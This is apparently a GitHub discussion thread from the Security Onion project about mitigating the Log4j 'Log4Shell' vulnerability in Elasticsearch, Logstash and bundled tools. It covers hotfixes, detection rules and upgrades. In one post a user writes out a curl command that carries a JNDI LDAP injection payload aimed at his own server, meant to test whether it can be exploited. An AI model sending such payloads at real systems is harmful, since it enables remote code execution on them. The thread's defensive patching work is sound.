CVE-2021-44228 – Log4j 2 Vulnerability

[krestian83]

Hello all,

Anyone dealing with this issue right now? https://www.randori.com/blog/cve-2021-44228/

I'm unsure of the best way of going about identifying which services are affected and how to patch or hot-fixing this , as Security Onion is quite complex :)

[dougburks]

We are monitoring this situation closely. Elasticsearch and Logstash may be affected and, if so, we suspect that Elastic would provide updates to address this.

[krestian83]

OK! Thank you for the quick reply!

…

-Christian

On Fri, Dec 10, 2021 at 1:25 PM Doug Burks ***@***.***> wrote: We are monitoring this situation closely. Elasticsearch and Logstash may be affected and, if so, we suspect that Elastic would provide updates to address this. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub <#6508 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASOESP56NQUWJVDUS4DWHOLUQHWSHANCNFSM5JY2AENQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>.

[jimhranicky]

It looks like log4j 2.9.1 is currently being used?

socore   31961  1.0  1.0 45394760 1318184 ?    Ssl  Dec08  30:17 java -Duser.dir=/opt/cortex[...]
/opt/cortex/lib/org.apache.logging.log4j.log4j-api-2.9.1.jar[...]

Would it be possible to upgrade to 2.10+ and add the

-Dlog4j2.formatMsgNoLookups=true

to the java command line options for the programs using it?

[dougburks]

We are currently testing the addition of -Dlog4j2.formatMsgNoLookups=true for Elasticsearch and Logstash:
https://github.com/Security-Onion-Solutions/securityonion/pull/6513/files
https://github.com/Security-Onion-Solutions/securityonion/pull/6514/files

We are still looking into the log4j bundled into TheHive/Cortex.

[jertel]

TheHive and Cortex do not ship with log4j-core-2.9.1jar, which is the JAR that contains the JNDI lookup code. Instead, TheHive and Cortex utilize the simple logging facade via log4j-to-slf4j-2.9.1.jar. That library does not contain the vulnerable JNDI lookup code.

[dougburks]

Security Onion 2.3.90 20211210 Hotfix Now Available to Mitigate log4j Vulnerability!
https://blog.securityonion.net/2021/12/security-onion-2390-20211210-hotfix-now.html

[dougburks]

Security Onion 2.3.90 20211213 Hotfix Now Available to Fully Mitigate All Known log4j Attack Vectors!
https://blog.securityonion.net/2021/12/security-onion-2390-20211213-hotfix-now.html

[krestian83]

Excellent news! Applying the updates now :) However, I have a question: How would one go about confirming the exploitability of this vulnerability in Security Onion / Elasticsearch+logstash ? This would be a great demo for some of the people in my org. I am unsure how I can trigger the JNDI lookup in elasticsearch or logstash to connect to an IP where I have set up my listener. I'm trying something like this: curl -k https://master-server/kibana/app/dashboards#/view -H 'X-Api-Version: ${jndi:ldap://listener-ip:1234}' but seems like this input is not logged by log4j. Br, Christian

…

On Fri, Dec 10, 2021 at 10:26 PM Doug Burks ***@***.***> wrote: Security Onion 2.3.90 20211210 Hotfix Now Available to Mitigate log4j Vulnerability! https://blog.securityonion.net/2021/12/security-onion-2390-20211210-hotfix-now.html — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub <#6508 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASOESP4FNLIUSXS64D5BCKLUQJWBTANCNFSM5JY2AENQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>.

[golfreeze]

=== After upgrade to bugfixed log4j and found cpu usage high around 390.4% when "top -c"
logstash 20 0 7012896 1.381g 19348 S 390.4 8.8 74:29.64 /usr/share/logstash/jdk/bin/java -Dlog4j2.formatMsgNoLookups=true -Xms1000m -Xmx1000m -cp /usr/share/logstash/l+

Anyone found this kind of case ?

[defensivedepth]

@golfreeze Can you please post the before & after Grafana graphs with the new abnormal CPU usage highlighted?

What type of deployment is this? Standalone, Distributed etc?

Also, run the following on the Logstash node:

sudo tail -f /opt/so/log/logstash/logstash.log

And post any errors you are seeing.

[golfreeze]

Hi @defensivedepth

deployment as : Standalone .

#tail -f /opt/so/log/logstash/logstash.log
[2021-12-13T12:45:38,604][WARN ][logstash.outputs.elasticsearch] Could not index event to Elasticsearch. {:status=>400, :action=>["index", {:_id=>nil, :_index=>"so-ossec", :routing=>nil, :pipeline=>"ossec"}, {"ecs"=>{"version"=>"1.11.0"}, "@Version"=>"1", "type"=>"redis-input", "module"=>"ossec", "agent"=>{"type"=>"filebeat", "id"=>"871d4cbd-4364-42fb-8bb3-52120fce68d7", "ephemeral_id"=>"70705580-d5c2-4577-bb98-ba7e9fe40d90", "hostname"=>"so-filebeat", "name"=>"so2", "version"=>"7.15.2"}, "message"=>"{"timestamp":"2021-12-13T12:45:35.233+0000","rule":{"level":3,"description":"Docker: Error message","id":"86003","firedtimes":13,"mail":false,"groups":["docker","docker-error"]},"agent":{"id":"001","name":"so2","ip":"103.86.50.193"},"manager":{"name":"so2-wazuh-manager"},"id":"1639399535.58596425","full_log":"Dec 13 12:45:35 so2 containerd[1314]: time=\"2021-12-13T12:45:35.010858254Z\" level=error msg=\"copy shim log\" error=\"read /proc/self/fd/74: file already closed\"","predecoder":{"program_name":"containerd","timestamp":"Dec 13 12:45:35","hostname":"so2"},"decoder":{"name":"docker"},"data":{"docker":{"level":"error","message":"copy shim log"}},"location":"/var/log/syslog"}", "category"=>"host", "@timestamp"=>2021-12-13T12:45:36.203Z, "tags"=>["beats_input_codec_plain_applied"], "time"=>"\"2021-12-13T12:45:35.010858254Z\"", "error"=>"\"read", "host"=>{"name"=>"so2"}, "level"=>"error", "log"=>{"offset"=>91924526, "file"=>{"path"=>"/wazuh/archives/archives.json"}}, "msg"=>"\"copy", "metadata"=>{"ip_address"=>"172.17.0.1", "beat"=>"filebeat", "type"=>"_doc", "version"=>"7.15.2", "pipeline"=>"ossec"}}], :response=>{"index"=>{"_index"=>"so-ossec-2021.12.13", "_type"=>"_doc", "_id"=>"0wLTs30B34bAp1cOv2qU", "status"=>400, "error"=>{"type"=>"mapper_parsing_exception", "reason"=>"object mapping for [error] tried to parse field [error] as object, but found a concrete value"}}}}

[defensivedepth]

@golfreeze After some internal discussion, we don't think this is related to the hotfix.

For further troubleshooting, please create a new Discussion, following the guidelines found here: #1720, specifically the Provide sufficient technical info section.

Thanks!

[golfreeze]

@defensivedepth Thank you for your discussion , I will keep reboot server and monitoring this issue and update back again.

[golfreeze]

@defensivedepth After reboot 1 times and keep monitor found cpu back to normal.
Thank you very much .

[chrisla23]

Are there any rules in place on the detection/alerting side?

Thanks,

-Chris

[dougburks]

Emerging Threats has released several rules over the last few days so your daily rule update should have downloaded them automatically:
http://lists.emergingthreats.net/pipermail/emerging-sigs/2021-December/thread.html

[krestian83]

Is SO is still running log4j 2.9.1 ? Or was it updated to 2.16 ?

…

On Tue, Dec 14, 2021 at 6:35 AM Watthanachai Packetlove.com < ***@***.***> wrote: @defensivedepth <https://github.com/defensivedepth> After reboot 1 times and keep monitor found cpu back to normal. Thank you very much . — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub <#6508 (reply in thread)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASOESPZYWIPKFW43J6SATA3UQ3JQRANCNFSM5JY2AENQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>.

[dougburks]

@krestian83 We have not updated log4j, but we have fully mitigated all known attack vectors by removing the JndiLookup class:
https://blog.securityonion.net/2021/12/security-onion-2390-20211213-hotfix-now.html

[krestian83]

Ok. An update to 2.16 through soup or a tutorial on how to do it manually without breaking anything would be great. The org I am in demands patching to 2.16 now wherever it is possible. I would assume we are not the only ones. If there is a legitimate reason for staying with the older versions (2.11 & 2.14?) I would be very happy to have something to forward to our sec people :) Br. Christian

…

On Wed, Dec 15, 2021 at 12:40 PM Doug Burks ***@***.***> wrote: @krestian83 <https://github.com/krestian83> We have not updated log4j, but we have fully mitigated all known attack vectors by removing the JndiLookup class: https://blog.securityonion.net/2021/12/security-onion-2390-20211213-hotfix-now.html — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#6508 (reply in thread)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASOESPZLEWE6EERKZPM2RGTURB5DZANCNFSM5JY2AENQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>.

[dougburks]

@krestian83

You can forward the following to your security people:

Security Onion uses the standard docker images from Elastic and Elastic has not updated to log4j 2.16. Security Onion's latest hotfix fully removes the vulnerable JndiLookup class and this fully mitigates all known attack vectors.

For more information, please see:
https://blog.securityonion.net/2021/12/security-onion-2390-20211213-hotfix-now.html
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

[krestian83]

Perfect. Thank you!

…

-Christian

On Wed, Dec 15, 2021 at 1:35 PM Doug Burks ***@***.***> wrote: @krestian83 <https://github.com/krestian83> You can forward the following to your security people: Security Onion uses the standard docker images from Elastic and Elastic has not updated to log4j 2.16. Security Onion's latest hotfix fully removes the vulnerable JndiLookup class and this fully mitigates all known attack vectors. For more information, please see: https://blog.securityonion.net/2021/12/security-onion-2390-20211213-hotfix-now.html https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476 — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <#6508 (reply in thread)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASOESP7YABEJTSIHWP6PTLDURCDPLANCNFSM5JY2AENQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>.

[pboosten]

Having followed this discussion for a couple of days, I'm still trying to figure out how this vulnerability could be exploited in SO:

Given the fact that this vulnerability exists (existed, updating is a controlled process in our organization) in logstash and elasticsearch, and you have to convince them to log a malicious string (that then has to be executed by log4j.
Both are not (by default) accessible from the outside, so in theory the threat only exists from authenticated users, right?

[krestian83]

Hello, I see Elastic came with an update yesterday that includes version 2.17 of log4j. When will this be available for SO? Br, Christian

…

On Fri, Dec 17, 2021 at 7:35 AM pboosten ***@***.***> wrote: Having followed this discussion for a couple of days, I'm still trying to figure out how this vulnerability could be exploited in SO: Given the fact that this vulnerability exists (existed, updating is a controlled process in our organization) in logstash and elasticsearch, and you have to convince them to log a malicious string (that then has to be executed by log4j. Both are not (by default) accessible from the outside, so in theory the threat only exists from authenticated users, right? — Reply to this email directly, view it on GitHub <#6508 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASOESP5YNZONLAWYCV4CIA3URLKZTANCNFSM5JY2AENQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>. You are receiving this because you were mentioned.Message ID: <Security-Onion-Solutions/securityonion/repo-discussions/6508/comments/1832032 @github.com>

[dougburks]

Yes, we saw that yesterday and are looking into it today. Updating to new Elastic containers will require a full release (not just a hotfix), so it will take some time.

[dougburks]

Security Onion 2.3.91 Now Available including Elastic 7.16.2 and Log4j 2.17.0!
https://blog.securityonion.net/2021/12/security-onion-2391-now-available.html

[krestian83]

Fantastic! Nice work

…

On Tue, Dec 21, 2021 at 3:47 PM Doug Burks ***@***.***> wrote: Security Onion 2.3.91 Now Available including Elastic 7.16.2 and Log4j 2.17.0! https://blog.securityonion.net/2021/12/security-onion-2391-now-available.html — Reply to this email directly, view it on GitHub <#6508 (reply in thread)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ASOESP2QVMEJYN6BRGF33GTUSCHPPANCNFSM5JY2AENQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>. You are receiving this because you were mentioned.Message ID: <Security-Onion-Solutions/securityonion/repo-discussions/6508/comments/1853148 @github.com>